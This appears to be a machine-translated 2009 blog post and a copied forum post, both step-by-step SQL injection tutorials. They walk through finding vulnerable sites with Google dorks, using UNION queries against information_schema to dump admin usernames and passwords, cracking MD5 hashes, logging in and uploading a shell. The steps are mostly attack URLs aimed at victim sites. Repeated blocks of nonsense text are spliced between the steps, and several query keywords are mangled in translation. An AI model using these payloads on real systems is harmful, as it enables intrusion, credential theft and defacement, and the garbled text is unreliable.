My Step by Step SQL Injection

Posted by Admin on February 15, 2009 - 6:00 pm

SOLIKIN LEADER
Filed under WOW

Understanding sql injection:

SQL injection is a hacking action performed on the client application by modifying an existing SQL
statement in memory clien application and also the technique of exploiting web applications that use a
database for storing therein data.

That need to be in the know before the mysql sql injection:

character: 'or –
EAT DRINK Wardi colorful
AGUS Lilik Silvi Tito
MARRIED EAT DRINK
together SARIMAN
comments: / * or -

information_schema to version: mysql 5.x version, no support for mysql version 4.x

===========

= Step A: =

===========

find the target

eg: [site] / berita.php? id = 100

Add the characters' at the end of the url or add the character "-" to see if there is an error message.

example: [site] / berita.php? id = 100 'or

[Site] / berita.php? Id =- 100

so the error message appears as follows (still bnyak again):

SOLIKIN SARIMAN BIN
BIN BIN colorful Wardi
Yanti SULASHADI
SARIMAN colorful BIN
WASTE WATER EAT
DRINK LARGE COMMON
HOUSEHOLD Maid
10000000000000000000
00000 EAT DRINK GLASS
PLATE SOLIKIN ENDANG
HAVID Haris GROSS BIN
ABDULLAH SARIMAN
Wardi Harjono Efendi
Maid HAVE ONCE after
mating repeated over and
over and over ONCE
MARRIED SOLIKIN Haris
DIAS HAVID Widi Yanti
Tito BIN Wardi adit with
colorful colorful EAT
DRINK Wardi Maid
charged with duty COOK
ROOM CLEANING PLATE
WASHING CLOTHES
WASHING SLEEP EAT
DRINK Silvi AGUS ANDI
Anin NUNUS BIN Wardi
SARIMAN EAT DRINK
defecate AGUS Lilik BIN
BIN SARIMAN Wardi
100000000000000000
AGUS Silvi PLATE GLASS
Yanti DIAS SUSKANDANI
BIN Wardi many TIMES
MARRIED
==========

= Step two: =

==========

find and count the number of tables that exist in the database ...

use the command: order by

example: [site] / berita.php? id =- 100 order by 1 - or

[Site] / berita.php? Id =- 100 order by 1 / *

check the every step (satupersatu) ...

eg: [site] / berita.php? id =- 100 order by 1 -

[Site] / berita.php? Id =- 100 orders by 2 -

[Site] / berita.php? Id =- 100 orders by 3 -

[Site] / berita.php? Id =- 100 orders by 4 -

so that it appears an error or missing error messages ...

eg: [site] / berita.php? id =- 100 orders by 9 -

means that we take is up to 8 digits

a [site] / berita.php? id =- 100 orders by 8 -

===========

= Step three: =

===========
to figure out how much appear to use union command

because of this error until the number 9

then: [site] / berita.php? id =- 100 union select 1,2,3,4,5,6,7,8 -

ok like a who out number 5

use the version command () or @ @ version to check version of sql command input diapakai who TSB
who went out last nagka

eg: [site] / berita.php? id =- 100 union select 1,2,3,4, version (), 6,7,8 - or

[Site] / berita.php? Id =- 100 union select 1,2,3,4, @ @ version, 6,7,8 -

SOLIKIN SARIMAN BIN
BIN BIN colorful Wardi
Yanti SULASHADI
SARIMAN colorful BIN
WASTE WATER EAT
DRINK LARGE COMMON
HOUSEHOLD Maid
10000000000000000000
00000 EAT DRINK GLASS
PLATE SOLIKIN ENDANG
HAVID Haris GROSS BIN
ABDULLAH SARIMAN
Wardi Harjono Efendi
Maid HAVE ONCE after
mating repeated over and
over and over ONCE
MARRIED SOLIKIN Haris
DIAS HAVID Widi Yanti
Tito BIN Wardi adit with
colorful colorful EAT
DRINK Wardi Maid
charged with duty COOK
ROOM CLEANING PLATE
WASHING CLOTHES
WASHING SLEEP EAT
DRINK Silvi AGUS ANDI
Anin NUNUS BIN Wardi
SARIMAN EAT DRINK
defecate AGUS Lilik BIN
BIN SARIMAN Wardi
100000000000000000
AGUS Silvi PLATE GLASS
Yanti DIAS SUSKANDANI
BIN Wardi many TIMES
MARRIED

see who is used like a version of version 4's leave because in this ver 4 we have to guess their own table
column n imaginable on the Web because they can not use the command From Information_schema ..

to version 5 then you are lucky to not have to guess the n column table like ver ver 5 4 because it can
use the command From Information_schema ..

============

= Step Four: =

============
SOLIKIN SARIMAN BIN
BIN BIN colorful Wardi
Yanti SULASHADI
SARIMAN colorful BIN
WASTE WATER EAT
DRINK LARGE COMMON
HOUSEHOLD Maid
10000000000000000000
00000 EAT DRINK GLASS
PLATE SOLIKIN ENDANG
HAVID Haris GROSS BIN
ABDULLAH SARIMAN
Wardi Harjono Efendi
Maid HAVE ONCE after
mating repeated over and
over and over ONCE
MARRIED SOLIKIN Haris
DIAS HAVID Widi Yanti
Tito BIN Wardi adit with
colorful colorful EAT
DRINK Wardi Maid
charged with duty COOK
ROOM CLEANING PLATE
WASHING CLOTHES
WASHING SLEEP EAT
DRINK Silvi AGUS ANDI
Anin NUNUS BIN Wardi
SARIMAN EAT DRINK
defecate AGUS Lilik BIN
BIN SARIMAN Wardi
100000000000000000
AGUS Silvi PLATE GLASS
Yanti DIAS SUSKANDANI
BIN Wardi many TIMES
MARRIED
to display the existing tables in the web address is

table_name command>>> included in the numbers who went out last

command from information_schema.tables / *>>> inserted after the last digit

[Site] / berita.php? Id =- 100 union select 1,2,3,4, table_name, 6,7,8 from information_schema.tables-

like a table that appears is "admin"

===========

= Step Five: =

===========

to display all the contents of the table address is

group_concat command (table_name)>>> included in the numbers who went out last
command from Nowhere information_schema.tables table_schema = database ()>>> inserted after the
last digit

[Site] / berita.php? Id =- 100 union select 1,2,3,4, group_concat (table_name), 6,7,8 from Nowhere
information_schema.tables table_schema = database () -

=============

= Step Six: =

=============

group_concat command (column_name)>>> included in the numbers who went out last

Nowhere information_schema.columns orders from table_name = 0xhexa->>> inserted after the last
digit

[Site] / berita.php? Id =- 100 union select 1,2,3,4, group_concat (column_name), 6,7,8 from
information_schema.columns table_name = 0xhexa-Nowhere

mandatory at this stage you mengextrak words on a hexadecimal table content that is by converting it

who used the website for conversions:

www.ascii-convert.co.cc

example in the covetous said conversion ie it will be 61646D696E admin

[Site] / berita.php? Id =- 100 union select 1,2,3,4, group_concat (column_name), 6,7,8 from Nowhere
information_schema.columns table_name = 0 × 61646D696E-
============

= Step-Seven: =

============

led to what had been excluded from the table that is by

concat_ws command (0 × 3a, the contents of the column who want removed)>>> included in the
numbers who went out last

order from (the name derived table)>>> inserted after the last digit

[Site] / berita.php? Id =- 100 union select 1,2,3,4, concat_ws (× 3a 0, the contents of column), 6,7,8 from
(table name derived) -

examples of words that come out are id, username, password

[Site] / berita.php? Id =- 100 union select 1,2,3,4, concat_ws (0 × 3a, id, username, password), 6,7,8 from
admin-

==============

= Step-Eight: =

==============

last stage of looking for the page admin or login

The next is up to you because there is a web of power in your hands ...

For More Clearly Can Download Video Tutorial This File With MySQL Injection
DOWNLOAD

Direct your run file "Injection.html SQL"

(Nb. apologize if there is one word or deficiencies in this video tutorial)

Greeting

Gonzhack

Comments RSS Feed Trackback URL Post a comment Share on Twitter Share on Facebook

13 Comments

1.

LinKL says:

March 29, 2009 at 4:03 pm

On the website my goal ..

Ga there recordID = ....

of disposable

cat 21:22

cat 22:23
 was how mas?

2.

Andyra says:

May 7, 2009 at 6:31 pm

om .. why I can not in step 3 yes

whereas step 1 ma 2 can but how can a three-_-y

om said in step 3 would be in the numbers ni?? Indeed figures out that important

Tw jangan2 ntu tu om hehehe toggle rate

om joke ...

Plis dong om .. kluenya again ..

3.

Patara says:

May 16, 2009 at 10:29 pm

Hi guys,

You managed to crash A Few radio stations in the UK on Friday and have very kindly pointed out how
you did it via this blog. Strangly Enough Now I am not upset, Because They are not mine!

However what it is That shows me you are very good and breaking through the UK what techies think
is a safe website. I therefore would like to employ you in a consultancy capacity to let me know how safe
certain sites develope As We Are Them. By this I mean That you are to charge me a consultancy fee per
site to let me know the weak points in any site That I send to you - however a NOT to crash it:)

I understand if you are cautious about Standard and Poor's approach, but want to leave you with a
thought: You guys are very smart - much smarter than my techies in the UK - Who Will be up and
running again at Some point, however I would like to put the knowledge you have to good use and I
always pay Someone WHO teaches me something. When I was younger I studied Martial Arts and was
taught That if Someone punches you in the face, it is Because you have a weak gaurd, so you Should
respect That Can anyone get your through guard and not make excuses for your own Weakness (in
letting the punches get through) well your punches got through and you have my respect:)

Hence I am willing to pay you to teach me how to stop getting passed our gaurd Others.

Regards

Patara

4.

Gardening says:

June 13, 2009 at 1:56 pm

Hello Guru, what entice you to post an article. This article was extremely interesting, ESPECIALLY
since I was searching for thoughts on this subject last Thursday.

5.

Denny Garden says:

June 13, 2009 at 4:37 pm

Such a usefule blog? Wow!!

6.

Lidia says:

June 26, 2009 at 3:17 pm

Mas, had long since learned to hack really want to, not purposely to see this website. Googling my
own again hence the problem of mysql injection nyantron here. That's really great video, dial-up
connection lemot internetku really, is there a smaller version of the pdf? Then there's a tutorial on
writing that is lost or accidentally dilengkapin not ya? please can not ask for the full article? Thanks loh!

7. share] step by step SQL injection just for the learning course

Solutions Forum - Bring news and applicationz FOR YOU:: Computer Stuff:: Networking, Programming &
Scripts:: Hacking
Page 1 of 1 • Share • Actions!

Actions!

View posts since last visit

View your posts

View unanswered posts

Topic being watched

Send to a friend

Copy the URL BBCode

Print this page

View previous topic View next topic Go down

[Share] step by step SQL injection just for the learning course
Post Admin on Thu January 16, 2010 5:14 pm

[Share] step by step SQL injection just for the learning course

since here there is thread "hacking hacking trick-Share is ngetrend" in addition to strengthening my
memory, I am very forgetful soale Wink)? / S7;

I'll share my knowledge this is only a little about how to conduct SQL injection on the web ... (remember
only for learning just ea ... Very Happy)

ga ato useful if too vulgar in del aja .. (Dueh unnoticed if ane ordinary vulgar Very Happy)

Before talking about SQL injection, first I'll explain what it is sql injection and how that could happen.
Actually SQL injection occurs when an attacker can insert some SQL statements to 'query' by
manipulating data input into the application TSB. Among DB formats such as PHP + MySQL and ASP +
MSACCESS or with MySql, here I'm just going to discuss about sql injection in the url only.

sob immediately wrote ...

1. looking at the first target with a dork mbah google "inurl: index.php? id =" (other dork can nyari on
google, many bgt koq)

2. suppose that already get the target http://www.korban.com/index.php?id=1

Add a single quote character "'" (without quotation marks) at the end of url

or add the character "-" to see if there is vuln.

so the url becomes http://www.korban.com/index.php?id=1 '

if there are errors on web pages means that Erb vuln if not search for other targets ...

3. locate and count the number of tables that exist in databasenya.gunakan command: + order + by +
numbers

so that it becomes http://www.korban.com/index.php?id=1+order+by+1-- url

now checks one by one until no longer find the error:

http://www.korban.com/index.php?id=1+order+by+1--
http://www.korban.com/index.php?id=1+order+by+2--

http://www.korban.com/index.php?id=1+order+by+3--

http://www.korban.com/index.php?id=1+order+by+4--

http://www.korban.com/index.php?id=1+order+by+4-- was not suppose to find the error again.

mean that we take is to figure 3

4. to figure out how much appear to use union command

because of this error until the number 3

then:

http://www.korban.com/index.php?id=1+union+select+1 ,2,3 -

5. figure out who suppose 2 use the command version () to check the version of sql command input
diapakai who TSB who went out last nagka

example:

http://www.korban.com/index.php?id=1+union+select+1, version () .3 -

who see the version used, if left alone version 4 because in this ver 4 we have to guess their own table
column n imaginable on the Web because they can not use the command from + information_schema
to version 5 then you are lucky to not have to guess the n column table like ver 4 because in ver 5 can
use the commands from + information_schema. continue ...

6. To display all the contents of the table address is group_concat command (table_name) -> included in
the numbers who went out last

command + from + information_schema.tables + Nowhere + table_schema = database () - -> inserted

after the last digit

so the url becomes http://www.korban.com/index.php?id=1+union+select+1, group_concat

(table_name), 3, + from + information_schema.tables + Nowhere + table_schema = database () -
7. suppose you have found the table that kira2 memnuat username + password is the table of "admin"
to change the admin table to hexadecimal form Dolo (can make here: http://www.string-
functions.com/string-hex.aspx)

8.masukkan group_concat command (column_name) -> included in the numbers who went out last

enter command + from + information_schema.columns + Nowhere + table_name = 61646d696e - ->

inserted after the last digit, 61646d696e is the word admin in the form of a hex

so the url becomes http://www.korban.com/index.php?id=1+union+select+1, group_concat

(column_name), 3 + from + information_schema.columns + Nowhere + table_name = 0x61646d696e -

9. Led to what had been excluded from the table that is by

group_concat command (0x3a, the contents of the column who want removed) -> included in the
numbers who went out last

command + from + (the name derived table) -> inserted after the last digit

example: the word that comes out is adminID, Name, password

thus becomes

http://www.korban.com/index.php?id=1+union+select+1, group_concat (adminID, 0x3a, Name, 0x3a,

password), 3 + from + admin -

10. 've met tuh username password na ma ... na tuh stay dencrypt pass. if the form could be on crack
md5 here http://www.md5decrypter.co.uk/

11. search login page Admin -> Login as admin -> Search fitur2 uploaded files or images -> then upload
your shell -> then whatever you want diapain tu web Very Happy. can be hell if directly PM tu web
admin who'll soon have the patch (na e-mail can also search the table yesteryear), Jagan in eah coz
deface web make it hard to sob ...

12. cape dee huft writing that much ..., del aja ga if useful ....
thx for the predecessors who have given science a cuma2 make ane ... Very Happy

Admin

Webmasters

Webmasters

Number of posts: 60

Age: 24

Location: Bandung

points: 89

Reputation: 0

Registration date: 2008-09-12

http://speechyourm1nd.blogspot.com/

Back to top Go down

*
Re: [share] step by step SQL injection just for the learning course

Post engkoh on Fri January 31, 2010 4:52 pm

nice info gan ..

engkoh